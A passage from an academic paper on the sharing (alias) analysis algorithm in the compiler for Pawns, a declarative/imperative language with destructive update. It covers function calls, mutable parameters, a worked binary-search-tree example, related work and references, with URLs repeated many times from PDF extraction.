is known statically and we can determine if the function is actually called or a closure is created instead. However, in general we must assume either could happen and add sharing for both. If a closure is created, the first N closure arguments share with the N arguments of the function call and any closure arguments of f share with additional closure arguments of the result (this requires renumbering of these arguments). Analysis of function calls relies on the sharing and mutability information attached to all arrow types. Because Pawns uses the syntax of statements to express pre- and post-conditions, our implementation uses the sharing analysis algorithm to derive an explicit alias set representation (currently this is done recursively, with the level of recursion limited by the fact than pre- and post-conditions must not contain function calls). Here we ignore the details of how the alias set representation is obtained. The compiler also uses the sharing information immediately before an application to check that the precondition is satisfied, all required “!” annotations are present and abstract variables are not modified. Given that the precondition is satisfied, the execution of a function results in sharing of parameters that is a subset of the union of the declared pre- and post-conditions (we assume the induction hypothesis holds for the sub-computation, which has a smaller depth of recursion). However, any sharing between non-mutable arguments that exists immediately after the call must exist before the call. The analysis algorithm does not add sharing between non-mutable arguments in the precondition as doing so would unnecessarily restrict how “high level” and “low level” code can be mixed. It is important we can pass a variable to a function that allows an abstract argument without the analysis concluding the variable subsequently shares with abstract, and therefore cannot be updated. Thus post is just the declared postcondition plus the subset of the precondition which involves mutable parameters of the function, renamed appropriately. The last N formal parameters, wK+1 ...wK+N are renamed as the arguments of the call, v1 ...vN and the formal result r is renamed v. The formal parameters w1 ...wK represent closure arguments K ...1 of f. Thus a variable component such as w1.[Cons.1] is renamed f.[Cl.K,Cons.1]. It is also necessary to include one step of transitivity in the sharing information: if variable components x1.c1 and x2.c2 alias in post and x2.c2 and x3.c3 (may) alias before the function call, we add an alias of x1.c1 and x3.c3 (in postt). Function parameters are proxies for the argument variables as well as any variable components they may alias and when functions are analysed these aliases are not known. This is why the transitivity step is needed, and why mutable parameters also require special treatment. If before the call, x1.c1 and x2.c2 may alias with mutable parameter components vi.c3 and vj.c4, respectively, and the two mutable parameter components alias in post then x1.c1 and x2.c2 may alias Naish (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.22 16/25 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.22 after the call; this is added in postm. Consider the example below, where we have a pair v1 (of references to references to integers) and variables x and y share with the two elements of v1, respectively. When v1 is passed to function f1 as a mutable parameter, sharing between x and y is introduced. The sharing of the mutable parameter in the postcondition, {v1.[Pair.1,Ref.1,Ref.1],v1.[Pair.2,Ref.1,Ref.1]}, results in sharing between x and y being added in the analysis. f1 :: Pair (Ref (Ref Int)) -> () sharing f1 !v1 = _ pre nosharing post *a = *b; v1 = Pair a b f1 !v1 = case v1 of (Pair rr1 rr2) -> *rr1 := *rr2 !v1 The need to be conservative with the sharing of mutable parameters in the analysis of function definitions (the special treatment in Assign) is illustrated by the example below. Consider the initial state, with variables v1 and v2 which share with x and y, respectively. After f2 is called x and y share, even though the parameters v1 and v2 do not share at any point in the execution of f2. If mutable parameters were not treated specially in the Assign case, nosharing would be accepted as the postcondition of f2 and the analysis of the call to f2 would then be incorrect. The sharing is introduced between memory cells that were once shared with v1 and others that were once shared with v2. Thus in our algorithm, the sharing of mutable parameters reflects all memory cells that are reachable from the parameters during the execution of the function. Where the mutable parameters are assigned in f2, the sharing of the parameters’ previous values (rr1 and rr2) is retained. Thus when the final assignment is processed, sharing between the parameters is added and this must be included in the postcondition. Although this assignment does not modify v1 or v2, the “!” annotations are necessary and alert the reader to potential modification of variables that shared with the parameters when the function was called. Naish (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.22 17/25 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.22 f2 :: Ref (Ref (Ref Int)) -> Ref (Ref (Ref Int)) -> () sharing f2 !v1 !v2 = _ pre nosharing post **v1 = **v2 f2 !v1 !v2 = *r10 = 10 -- ref to new cell containing 10 *rr10 = r10 -- ref to above ref *r20 = 20 -- ref to new cell containing 20 *rr20 = r20 -- ref to above ref rr1 = *v1 -- save *v1 rr2 = *v2 -- save *v2 *!v1 := rr10 -- update *v1 with Ref (Ref 10) *!v2 := rr20 -- update *v2 with Ref (Ref 20) *rr1 := *rr2 !v1!v2 -- can create sharing at call alias Error a0 = ∅ -- error alias (Case v [(p1,s1),...(pN,sN)]) a0 = -- case v of ... let old = {{v.c1,v2.c2 | {v.c1,v2.c2} ∈ a0} in  1≤ i≤ N aliasCase a0 old v pi si aliasCase a0 av v (Pat dc [v1,... vN]) s = -- (Dc *v1...*vN) -> s let avdc = {{fc(v.(dc.i:c1)),w.c2} | {fc(v.(dc.i:c1)),w.c2} ∈ av} rself = {{vi.[Ref.1],vi.[Ref.1]} | 1 ≤ i ≤ N} vishare = {{fc(vi.(Ref.1:c1)),fc(vj.(Ref.1:c2))} | {fc(v.(dc.i:c1)),fc(v.(dc.j:c2))} ∈ av} share = {{fc(vi.(Ref.1:c1)),w.c2} | {fc(v.(dc.i:c1)),w.c2))} ∈ av} in alias s (rself ∪ vishare ∪ share∪(a0 \ av)∪ avdc) For a case expression we return the union of the alias sets obtained for each of the different branches. For each branch, we only keep sharing information for the variable we are switching on that is compatible with the data constructor in that branch (we remove all the old sharing, av, and add the compatible sharing, avdc). We implicitly use the inverse of fc. To deal with individual data constructors, we consider pairs of components of arguments i and j which may alias in order to compute possible sharing between vi and vj, including self-aliases when i = j. The corresponding component of vi (prepended with Ref and folded) may alias the component of vj. For example, if v of type RTrees is matched with Cons *v1 *v2 and v.[] self-aliases, we need to find the components which fold to v.[] (v.[Cons.2] and v.[Cons.1,RNode.2]) in order to compute the sharing for v2 and v1. Thus we compute that v2.[Ref.1], may alias v1.[Ref.1,RNode.2]. This can occur if the data structure is cyclic, such as the example below where v is a list containing a single tree with 2 in the node and v as the children (hence it represents a single infinite branch). Note that v1.[Ref.1,RNode.2] represents both the memory cell containing the Cons pointer and the cell containing Nil. Naish (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.22 18/25 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.22 alias (Instype v1 v2) a0 = -- v1 = v2::t alias (EqVar v1 v2) a0 -- (if any sharing is introduced between v1 and v2, -- v2 must not be indirectly updated later while live) Type instantiation is dealt with in the same way as variable equality, with the additional check that if any sharing is introduced, the variable with the more general type is not implicitly updated later while still live (it is sufficient to check there is no “!v2” annotation attached to a later statement). EXAMPLE We now show how this sharing analysis algorithm is applied to the binary search tree code given earlier. We give a core Pawns version of each function and the alias set before and after each statement, plus an additional set at the end which is the union of the pre- and post-conditions of the function. To save space, we write the alias set as a set of sets where each inner set represents all sets containing exactly two of its members. Thus {{a,b,c}} represents a set of six alias pairs: aliasing between all pairs of elements, including self-aliases. The return value is given by variable ret and variables absL and absT are the versions of abstract for type Ints and Tree, respectively. list_bst xs = -- 0 v1 = TNil -- 1 *tp = v1 -- 2 list_bst_du xs !tp -- 3 ret = *tp -- 4 We start with the precondition: a0 = {{xs.[Cons.1], absL.[Cons.1]}, {xs.[], absL.[]}}. Binding to a constant introduces no sharing so a1 = a0. a2 = a1∪{tp.[Ref.1]}. The function call has precondition a0 ∪ {{tp.[Ref.1]},{tp.[Ref.1,Node.2]}}, which is a superset of a2. Since tp is a mutable argument the precondition sharing for tp is added: a3 = a2 ∪ {{tp.[Ref.1,Node.2]}}. The final sharing includes the return variable, ret: a4 = a3 ∪ {{ret.[],tp.[Ref.1]}, {ret.[Node.2],tp.[Ref.1,Node.2]}}. After removing sharing for the dead (local) variable tp we obtain a subset of the union of the pre- and post-conditions, which is a0 ∪ {{ret.[],absT.[]},{ret.[Node.2], absT.[Node.2]}}. list_bst_du xs !tp = -- 0 case xs of (Cons *v1 *v2) -> -- 1 Naish (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.22 19/25 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.22 x = *v1 -- 2 xs1 = *v2 -- 3 v3 = bst_insert_du x !tp -- 4 v4 = list_bst_du xs1 !tp -- 5 ret = v4 -- 6 Nil -> -- 7 ret = () -- 8 -- after case -- 9 We start with the precondition, a0 = {{tp.[Ref.1]}, {tp.[Ref.1,Node.2]}, {xs.[Cons.1],absL.[Cons.1]},{xs.[],absL.[]}}. The Cons branch of the case introduces sharing for v1 and v2: a1 = a0∪{{xs.[Cons.1], absL.[Cons.1], v1.[Ref.1], v2.[Ref.1,Cons.1]},{v2.[Ref.1],xs.[], absL.[]}}. The list elements are atomic so a2 = a1. The next binding makes the sharing of xs1 and xs the same: a3 = a2∪{{v2.[Ref.1],xs.[], xs1.[], absL.[]}, {v1.[Ref.1],xs.[Cons.1], xs1.[Cons.1], absL.[Cons.1], v2.[Ref.1,Cons.1]}}. This can be simplified by removing the dead variables v1 and v2. The precondition of the calls are satisfied and a6 = a5 = a4 = a3. For the Nil branch, we remove the incompatible sharing for xs from a0: a7 = {{tp.[Ref.1]}, {tp.[Ref.1,Node.2]}, {absL.[Cons.1]}, {absL.[]}} and a8 = a7. Finally, a9 = a6 ∪ a8. This contains all the sharing for mutable parameter tp and, ignoring local variables, is a subset of the union of the pre- and post-conditions, a0. bst_insert_du x !tp = -- 0 v1 = *tp -- 1 case v1 of TNil -> -- 2 v2 = TNil -- 3 v3 = TNil -- 4 v4 = Node v2 x v3 -- 5 *!tp := v4 -- 6 ret = () -- 7 (Node *lp *v5 *rp) -> -- 8 n = *v5 -- 9 v6 = (x <= n) -- 10 case v6 of True -> -- 11 v7 = (bst_insert_du x !lp) !tp -- 12 ret = v7 -- 13 False -> -- 14 v8 = (bst_insert_du x !rp) !tp -- 15 ret = v8 -- 16 -- end case -- 17 -- end case -- 18 Naish (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.22 20/25 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.22 Here a0 = {{tp.[Ref.1]}, {tp.[Ref.1,Node.2]}} and a1 = a0 ∪ {{v1.[], tp.[Ref.1]}, {tp.[Ref.1,Node.2], v1.[Node.2]}}. For the TNil branch we remove the v1 sharing so a4 = a3 = a2 = a0 and a5 = a4 ∪ {{v4.[]}, {v4.[Node.2]}}. After the destructive update, a6 = a5 ∪ {{v4.[], tp.[Ref.1]}, {v4.[Node.2], tp.[Ref.1,Node.2]}} (v4 is dead and can be removed) and a7 = a6. For the Node branch we have a8 = a1 ∪ {{v1.[], tp.[Ref.1], lp.[Ref.1], rp.[Ref.1]}, {tp.[Ref.1,Node.2], lp.[Ref.1,Node.2], rp.[Ref.1,Node.2], v5.[Ref.1], v1.[Node.2]}}. The same set is retained for a9 ...a17 (assuming the dead variable v5 is retained), the preconditions of the function calls are satisfied and the required annotations are present. Finally, a18 = a17 ∪ a7, which contains all the sharing for tp, and after eliminating local variables we get the postcondition, which is the same as the precondition. DISCUSSION Imprecision in the analysis of mutable parameters could potentially be reduced by allowing the user to declare that only certain parts of a data structure are mutable, as suggested in Naish (2015). It is inevitable we lose some precision with recursion in types, but it seems that some loss of precision could be avoided relatively easily. The use of the empty path to represent sub-components of recursive types results in imprecision when references are created. For example, the analysis of *vp = Nil; v = *vp concludes that the empty component of v may alias with itself and the Ref component of vp (in reality, v has no sharing). Instead of the empty path, a dummy path of length one could be used. Flagging data structures which are known to be acyclic could also improve precision for Case. A more aggressive approach would be to unfold the recursion an extra level, at least for some types. This could allow us to express (non-)sharing of separate subtrees and whether data structures are cyclic, at the cost of more variable components, more complex pre- and post-conditions and more complex analysis for Assign and Case. Increasing the number of variable components also decreases efficiency. The algorith- mic complexity is affected by the representation of alias sets. Currently we use a naive implementation, using just ordered pairs of variable components as the set elements and a set library which uses an ordered binary tree. The size of the set can be O(N 2), where N is the maximum number of live variable components of the same type at any program point (each such variable component can alias with all the others). In typical code, the number of live variables at any point is not particularly large. If the size of alias sets does become problematic, a more refined set representation could be used, such as the set of sets of pairs representation we used in ‘Example,’ where sets of components that all alias with each other are optimised. There are also simpler opportunities for efficiency gains, such as avoiding sharing analysis for entirely pure code. We have not stress tested our implementation or run substantial benchmarks as it is intended to be a prototype, but performance has been encouraging. Translating the tree insertion code plus a test harness to C, which includes the sharing analysis, takes less time than compiling the resulting C code using GCC. Total compilation time is less than half that of GHC for equivalent Haskell code and less than one Naish (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.22 21/25 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.22 tenth that of MLton for equivalent ML code. The Pawns executable is around 3–4 times as fast as the others. RELATED WORK Related programming languages are discussed in Naish (2015); here we restrict attention to work related to the sharing analysis algorithm. The most closely related work is that done in the compiler for Mars Giuca (2014), which extends similar work done for Mercury (Mazur et al., 2001) and earlier for Prolog Mulkers (1993). All use a similar abstract domain based on the type folding method first proposed in Bruynooghe (1986). Our abstract domain is somewhat more precise due to inclusion of self-aliasing, and we have no sharing for constants. In Mars it is assumed that constants other than numbers can share. Thus, for code such as xs = []; ys = xs our analysis concludes there is no sharing between xs and ys whereas the Mars analysis concludes there may be sharing. One important distinction is that in Pawns sharing (and mutability) is declared in type signatures of functions so the Pawns compiler just has to check the declarations are consistent, rather than infer all sharing from the code. However, it does have the added complication of destructive update. As well as having to deal with the assignment primitive, it complicates handling of function calls and case statements (the latter due to the potential for cyclic structures). Mars, Mercury and Prolog are essentially declarative languages. Although Mars has assignment statements the semantics is that values are copied rather than destructively updated—the variable being assigned is modified but other variables remain unchanged. Sharing analysis is used in these languages to make the implementation more efficient. For example, the Mars compiler can often emit code to destructively update rather than copy a data structure because sharing analysis reveals no other live variables share it. In Mercury and Prolog, the analysis can reveal when heap-allocated data is no longer used, so the code can reuse or reclaim it directly instead of invoking a garbage collector. These sharing inference systems use an explicit graph representation of the sharing behaviour of each segment of code. For example, code s1 may cause aliasing between (a component of ) variables a and b (which is represented as an edge between nodes a and b) and between c and d and code s2 may cause aliasing between b and c and between d and e. To compute the sharing for the sequence s1;s2 they use the “alternating closure” of the sharing for s1 and s2, which constructs paths with edges alternating from s1 and s2, for example a-b (from s1), b-c (from s2), c-d (from s1) and d-e (from s2). The sharing behaviour of functions in Pawns is represented explicitly, by a pre- and post-condition and set of mutable arguments but there is no explicit representation for sharing of statements. The (curried) function alias s represents the sharing behaviour of s and the sharing behaviour of a sequence of statements is represented by the composition of functions. This representation has the advantage that the function can easily use information about the current sharing, including self-aliases, and remove some if appropriate. For example, in the [] branch of the case in the code below the sharing for xs is removed and we can conclude the returned value does not share with the argument. Naish (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.22 22/25 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.22 map_const_1 :: [t] -> [Int] sharing map_const_1 xs = ys pre nosharing post nosharing map_const_1 xs = case xs of [] -> xs -- can look like result shares with xs (_:xs1) -> 1:(map_const_1 xs1) There is also substantial work on sharing analysis for logic programming languages using other abstract domains, notably the set-sharing domain of Jacobs & Langen (1989) (a set of sets of variables), generally with various enhancements—see Bagnara, Zaffanella & Hill (2005) for a good summary and evaluation. Applications include avoiding the “occurs check” in unification (Søndergaard, 1986) and exploiting parallelism of independent sub-computations (Bueno, Garćıa de la Banda & Hermenegildo, 1999). These approaches are aimed at identifying sharing of logic variables rather than sharing of data structures. For example, although the two Prolog goals p(X) and q(X) share X, they are considered independent if X is instantiated to a data structure that is ground (contains no logic variables). Ground data structures in Prolog are read-only and cause no problem for parallelism or the occurs check, whether they are shared or not. The set-sharing domain is often augmented with extra information related to freeness (free means uninstantiated), linearity (linear means there are no repeated occurrences of any variable) and/or groundness (Bagnara, Zaffanella & Hill, 2005). In Pawns there are no logic variables but data structures are mutable, hence their sharing is important. However, the set-sharing domain (with enhancements) has been adapted to analysis of sharing of data structures in object oriented languages such as Java (Méndez-Lojo & Hermenegildo, 2008). One important distinction is that Pawns directly supports algebraic data types which allow a “sum of products”: there can be a choice of several data constructors (a sum), where each one consists of several values as arguments (a product). In Java and most other imperative and object oriented languages, additional coding is generally required to support such data types. Products are supported by objects containing several values but the only choice (sum) supported directly is whether the object is null or not. Java objects and pointers in most imperative languages are similar to a Maybe algebraic data type, with Nothing corresponding to null. A Ref cannot be null. The abstract domain of Méndez-Lojo & Hermenegildo (2008) uses set-sharing plus additional information about what objects are definitely not null. For Pawns code that uses Refs this information is given by the data type—the more expressive types allow us to trivially infer some information that is obscured in other languages. For code that uses Maybe, our domain can express the fact that a variable is definitely Nothing by not having a self-alias of the Just component. The rich structural information in our domain fits particularly well with algebraic data types. There are also other approaches to and uses of alias analysis for imperative languages, such as Landi & Ryder (1992) and Emami, Ghiya & Hendren (1994), but these are not aimed at precisely capturing information about dynamically allocated data. A more detailed discussion of such approaches is given in Giuca (2014). Naish (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.22 23/25 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.22 CONCLUSION Purely declarative languages have the advantage of avoiding side effects, such as destructive update of function arguments. This makes it easier to combine program components, but some algorithms are hard to code efficiently without flexible use of destructive update. A function can behave in a purely declarative way if destructive update is allowed, but restricted to data structures that are created inside the function. The Pawns language uses this idea to support flexible destructive update encapsulated in a declarative interface. It is designed to make all side effects “obvious” from the source code. Because there can be sharing between the representations of different arguments of a function, local variables and the value returned, sharing analysis is an essential component of the compiler. It is also used to ensure “preservation” of types in computations. Sharing analysis has been used in other languages to improve efficiency and to give some feedback to programmers but we use it to support important features of the programming language. The algorithm operates on (heap allocated) algebraic data types, including arrays and closures. In common with other sharing analysis used in declarative languages it supports binding of variables, construction and deconstruction (combined with selection or “case”) and function/procedure calls. In addition, it supports explicit pointers, destructive update via pointers, creation and application of closures and pre- and post-conditions concerning sharing attached to type signatures of functions. It also uses an abstract domain with additional features to improve precision. Early indications are that the performance is acceptable: compared with other compilers for declarative languages, the prototype Pawns compiler supports encapsulated destructive update, is fast and produces fast executables. ACKNOWLEDGEMENTS Feedback from reviewers, particularly Gianluca Amato, was very helpful in ironing out some important bugs in the algorithm and improving the presentation of this paper. ADDITIONAL INFORMATION AND DECLARATIONS Funding The author declares there was no funding for this work. Competing Interests The author declares there are no competing interests. Author Contributions • Lee Naish conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. Data Availability The following information was supplied regarding the availability of data: http://people.eng.unimelb.edu.au/lee/src/pawns/. Naish (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.22 24/25 https://peerj.com/computer-science/ http://people.eng.unimelb.edu.au/lee/src/pawns/ http://people.eng.unimelb.edu.au/lee/src/pawns/ http://people.eng.unimelb.edu.au/lee/src/pawns/ http://people.eng.unimelb.edu.au/lee/src/pawns/ http://people.eng.unimelb.edu.au/lee/src/pawns/ http://people.eng.unimelb.edu.au/lee/src/pawns/ http://people.eng.unimelb.edu.au/lee/src/pawns/ http://people.eng.unimelb.edu.au/lee/src/pawns/ http://people.eng.unimelb.edu.au/lee/src/pawns/ http://people.eng.unimelb.edu.au/lee/src/pawns/ http://people.eng.unimelb.edu.au/lee/src/pawns/ http://people.eng.unimelb.edu.au/lee/src/pawns/ http://people.eng.unimelb.edu.au/lee/src/pawns/ http://people.eng.unimelb.edu.au/lee/src/pawns/ http://people.eng.unimelb.edu.au/lee/src/pawns/ http://people.eng.unimelb.edu.au/lee/src/pawns/ http://people.eng.unimelb.edu.au/lee/src/pawns/ http://people.eng.unimelb.edu.au/lee/src/pawns/ http://people.eng.unimelb.edu.au/lee/src/pawns/ http://people.eng.unimelb.edu.au/lee/src/pawns/ http://people.eng.unimelb.edu.au/lee/src/pawns/ http://people.eng.unimelb.edu.au/lee/src/pawns/ http://people.eng.unimelb.edu.au/lee/src/pawns/ http://people.eng.unimelb.edu.au/lee/src/pawns/ http://people.eng.unimelb.edu.au/lee/src/pawns/ http://people.eng.unimelb.edu.au/lee/src/pawns/ http://people.eng.unimelb.edu.au/lee/src/pawns/ http://people.eng.unimelb.edu.au/lee/src/pawns/ http://people.eng.unimelb.edu.au/lee/src/pawns/ http://people.eng.unimelb.edu.au/lee/src/pawns/ http://people.eng.unimelb.edu.au/lee/src/pawns/ http://people.eng.unimelb.edu.au/lee/src/pawns/ http://people.eng.unimelb.edu.au/lee/src/pawns/ http://people.eng.unimelb.edu.au/lee/src/pawns/ http://people.eng.unimelb.edu.au/lee/src/pawns/ http://people.eng.unimelb.edu.au/lee/src/pawns/ http://people.eng.unimelb.edu.au/lee/src/pawns/ http://people.eng.unimelb.edu.au/lee/src/pawns/ http://people.eng.unimelb.edu.au/lee/src/pawns/ http://people.eng.unimelb.edu.au/lee/src/pawns/ http://people.eng.unimelb.edu.au/lee/src/pawns/ http://people.eng.unimelb.edu.au/lee/src/pawns/ http://people.eng.unimelb.edu.au/lee/src/pawns/ http://people.eng.unimelb.edu.au/lee/src/pawns/ http://people.eng.unimelb.edu.au/lee/src/pawns/ http://people.eng.unimelb.edu.au/lee/src/pawns/ http://people.eng.unimelb.edu.au/lee/src/pawns/ http://dx.doi.org/10.7717/peerj-cs.22 REFERENCES Bagnara R, Zaffanella E, Hill P M. 2005. Enhanced sharing analysis techniques: a comprehensive evaluation. In: Theory and practice of logic programming. vol. 5. 1–43. Available at http://journals. cambridge.org/article S1471068404001978. Bruynooghe M. 1986. Compile time garbage collection or how to transform programs in an assignment free languages into code with assignments. In: iFIP TC2/WG2.1 working conference on program specification and transformation, Bad-Tölz, Germany, 1986. Available at https://lirias. kuleuven.be/handle/123456789/134112. Bueno F, Garcı́a de la Banda M, Hermenegildo M. 1999. Effectivness of abstract interpretation in automatic parallelization: a case study in logic programming. ACM Transactions on Programming Languages and Systems 21(2):189–239 DOI 10.1145/316686.316688. Emami M, Ghiya R, Hendren LJ. 1994. Context-sensitive interprocedural points-to analysis in the presence of function pointers. In: Proceedings of the ACM SIGPLAN 1994 conference on programming language design and implementation, PLDI’94. New York: ACM, 242–256. DOI 10.1145/178243.178264. Giuca M. 2014. Mars: an imperative/declarative higher-order programming language with automatic destructive update. PhD dissertation, University of Melbourne. Jacobs D, Langen A. 1989. Accurate and efficient approximation of variable aliasing in logic programs. In: Lusk EL, Overbeek RA, eds. MIT press. 154–165. Available at http://dblp.uni-trier. de/db/conf/slp/slp89.html#JacobsL89. Jones SP, Hughes J, Augustsson L, Barton D, Boutel B, Burton W, Fasel J, Hammond K, Hinze R, Hudak P et al. 1999. Report on the programming language Haskell 98, a non-strict purely functional language, February 1999. Available at http://www.haskell.org/definition/. Landi W, Ryder BG. 1992. A safe approximate algorithm for interprocedural aliasing. ACM SIGPLAN Notices 27(7):235–248. DOI 10.1145/143103.143137. Lippmeier B. 2009. Type inference and optimisation for an impure world. PhD diss., Australian National University. Available at http://cs.anu.edu.au/∼Ben.Lippmeier/project/thesis/ thesis-lippmeier-sub.pdf. Mazur N, Ross P, Janssens G, Bruynooghe M. 2001. Practical aspects for a working compile time garbage collection system for Mercury. In: Codognet P, ed. Proceedings of ICLP 2001, Lecture notes in computer science, vol. 2237. Springer, 105–119. Available at https://lirias.kuleuven.be/ handle/123456789/131659. Méndez-Lojo M, Hermenegildo M. 2008. Precise set sharing analysis for Java-style programs. In: Logozzo F, Peled D, Zuck L, eds. Verification, model checking, and abstract interpretation, Lecture notes in computer science, vol. 4905. Berlin Heidelberg: Springer, 172–187. Available at http://dx.doi.org/10.1007/978-3-540-78163-9 17. Milner R, Tofte M, Macqueen D. 1997. The definition of standard ML. Cambridge: MIT Press. Mulkers A. 1993. Live data structures in logic programs, derivation by means of abstract interpretation. Springer-Verlag. Available at https://lirias.kuleuven.be/handle/123456789/134658. Naish L. 2015. An informal introduction to Pawns: a declarative/imperative language. Available at http://people.eng.unimelb.edu.au/lee/papers/pawns (accessed 16 March 2015). Søndergaard H. 1986. An application of abstract interpretation of logic programs: occur check reduction. In: Proceedings of the European symposium on programming on ESOP 86. New York: Springer-Verlag New York, Inc., 327–338. Available at http://dl.acm.org/citation.cfm?id=20952. 20977. Wright A. 1995. Simple imperative polymorphism. LISP and Symbolic Computation 8(4):343–356 DOI 10.1007/BF01018828. Naish (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.22 25/25 https://peerj.com/computer-science/ http://journals.cambridge.org/article_S1471068404001978 http://journals.cambridge.org/article_S1471068404001978 http://journals.cambridge.org/article_S1471068404001978 http://journals.cambridge.org/article_S1471068404001978 http://journals.cambridge.org/article_S1471068404001978 http://journals.cambridge.org/article_S1471068404001978 http://journals.cambridge.org/article_S1471068404001978 http://journals.cambridge.org/article_S1471068404001978 http://journals.cambridge.org/article_S1471068404001978 http://journals.cambridge.org/article_S1471068404001978 http://journals.cambridge.org/article_S1471068404001978 http://journals.cambridge.org/article_S1471068404001978 http://journals.cambridge.org/article_S1471068404001978 http://journals.cambridge.org/article_S1471068404001978 http://journals.cambridge.org/article_S1471068404001978 http://journals.cambridge.org/article_S1471068404001978 http://journals.cambridge.org/article_S1471068404001978 http://journals.cambridge.org/article_S1471068404001978 http://journals.cambridge.org/article_S1471068404001978 http://journals.cambridge.org/article_S1471068404001978 http://journals.cambridge.org/article_S1471068404001978 http://journals.cambridge.org/article_S1471068404001978 http://journals.cambridge.org/article_S1471068404001978 http://journals.cambridge.org/article_S1471068404001978 http://journals.cambridge.org/article_S1471068404001978 http://journals.cambridge.org/article_S1471068404001978 http://journals.cambridge.org/article_S1471068404001978 http://journals.cambridge.org/article_S1471068404001978 http://journals.cambridge.org/article_S1471068404001978 http://journals.cambridge.org/article_S1471068404001978 http://journals.cambridge.org/article_S1471068404001978 http://journals.cambridge.org/article_S1471068404001978 http://journals.cambridge.org/article_S1471068404001978 http://journals.cambridge.org/article_S1471068404001978 http://journals.cambridge.org/article_S1471068404001978 http://journals.cambridge.org/article_S1471068404001978 http://journals.cambridge.org/article_S1471068404001978 http://journals.cambridge.org/article_S1471068404001978 http://journals.cambridge.org/article_S1471068404001978 http://journals.cambridge.org/article_S1471068404001978 http://journals.cambridge.org/article_S1471068404001978 http://journals.cambridge.org/article_S1471068404001978 http://journals.cambridge.org/article_S1471068404001978 http://journals.cambridge.org/article_S1471068404001978 http://journals.cambridge.org/article_S1471068404001978 http://journals.cambridge.org/article_S1471068404001978 http://journals.cambridge.org/article_S1471068404001978 http://journals.cambridge.org/article_S1471068404001978 http://journals.cambridge.org/article_S1471068404001978 http://journals.cambridge.org/article_S1471068404001978 http://journals.cambridge.org/article_S1471068404001978 http://journals.cambridge.org/article_S1471068404001978 http://journals.cambridge.org/article_S1471068404001978 http://journals.cambridge.org/article_S1471068404001978 http://journals.cambridge.org/article_S1471068404001978 https://lirias.kuleuven.be/handle/123456789/134112 https://lirias.kuleuven.be/handle/123456789/134112 https://lirias.kuleuven.be/handle/123456789/134112 https://lirias.kuleuven.be/handle/123456789/134112 https://lirias.kuleuven.be/handle/123456789/134112 https://lirias.kuleuven.be/handle/123456789/134112 https://lirias.kuleuven.be/handle/123456789/134112 https://lirias.kuleuven.be/handle/123456789/134112 https://lirias.kuleuven.be/handle/123456789/134112 https://lirias.kuleuven.be/handle/123456789/134112 https://lirias.kuleuven.be/handle/123456789/134112 https://lirias.kuleuven.be/handle/123456789/134112 https://lirias.kuleuven.be/handle/123456789/134112 https://lirias.kuleuven.be/handle/123456789/134112 https://lirias.kuleuven.be/handle/123456789/134112 https://lirias.kuleuven.be/handle/123456789/134112 https://lirias.kuleuven.be/handle/123456789/134112 https://lirias.kuleuven.be/handle/123456789/134112 https://lirias.kuleuven.be/handle/123456789/134112 https://lirias.kuleuven.be/handle/123456789/134112 https://lirias.kuleuven.be/handle/123456789/134112 https://lirias.kuleuven.be/handle/123456789/134112 https://lirias.kuleuven.be/handle/123456789/134112 https://lirias.kuleuven.be/handle/123456789/134112 https://lirias.kuleuven.be/handle/123456789/134112 https://lirias.kuleuven.be/handle/123456789/134112 https://lirias.kuleuven.be/handle/123456789/134112 https://lirias.kuleuven.be/handle/123456789/134112 https://lirias.kuleuven.be/handle/123456789/134112 https://lirias.kuleuven.be/handle/123456789/134112 https://lirias.kuleuven.be/handle/123456789/134112 https://lirias.kuleuven.be/handle/123456789/134112 https://lirias.kuleuven.be/handle/123456789/134112 https://lirias.kuleuven.be/handle/123456789/134112 https://lirias.kuleuven.be/handle/123456789/134112 https://lirias.kuleuven.be/handle/123456789/134112 https://lirias.kuleuven.be/handle/123456789/134112 https://lirias.kuleuven.be/handle/123456789/134112 https://lirias.kuleuven.be/handle/123456789/134112 https://lirias.kuleuven.be/handle/123456789/134112 https://lirias.kuleuven.be/handle/123456789/134112 https://lirias.kuleuven.be/handle/123456789/134112 https://lirias.kuleuven.be/handle/123456789/134112 https://lirias.kuleuven.be/handle/123456789/134112 https://lirias.kuleuven.be/handle/123456789/134112 https://lirias.kuleuven.be/handle/123456789/134112 https://lirias.kuleuven.be/handle/123456789/134112 https://lirias.kuleuven.be/handle/123456789/134112 https://lirias.kuleuven.be/handle/123456789/134112 https://lirias.kuleuven.be/handle/123456789/134112 http://dx.doi.org/10.1145/316686.316688 http://dx.doi.org/10.1145/178243.178264 http://dblp.uni-trier.de/db/conf/slp/slp89.html#JacobsL89 http://dblp.uni-trier.de/db/conf/slp/slp89.html#JacobsL89 http://dblp.uni-trier.de/db/conf/slp/slp89.html#JacobsL89 http://dblp.uni-trier.de/db/conf/slp/slp89.html#JacobsL89 http://dblp.uni-trier.de/db/conf/slp/slp89.html#JacobsL89 http://dblp.uni-trier.de/db/conf/slp/slp89.html#JacobsL89 http://dblp.uni-trier.de/db/conf/slp/slp89.html#JacobsL89 http://dblp.uni-trier.de/db/conf/slp/slp89.html#JacobsL89 http://dblp.uni-trier.de/db/conf/slp/slp89.html#JacobsL89 http://dblp.uni-trier.de/db/conf/slp/slp89.html#JacobsL89 http://dblp.uni-trier.de/db/conf/slp/slp89.html#JacobsL89 http://dblp.uni-trier.de/db/conf/slp/slp89.html#JacobsL89 http://dblp.uni-trier.de/db/conf/slp/slp89.html#JacobsL89 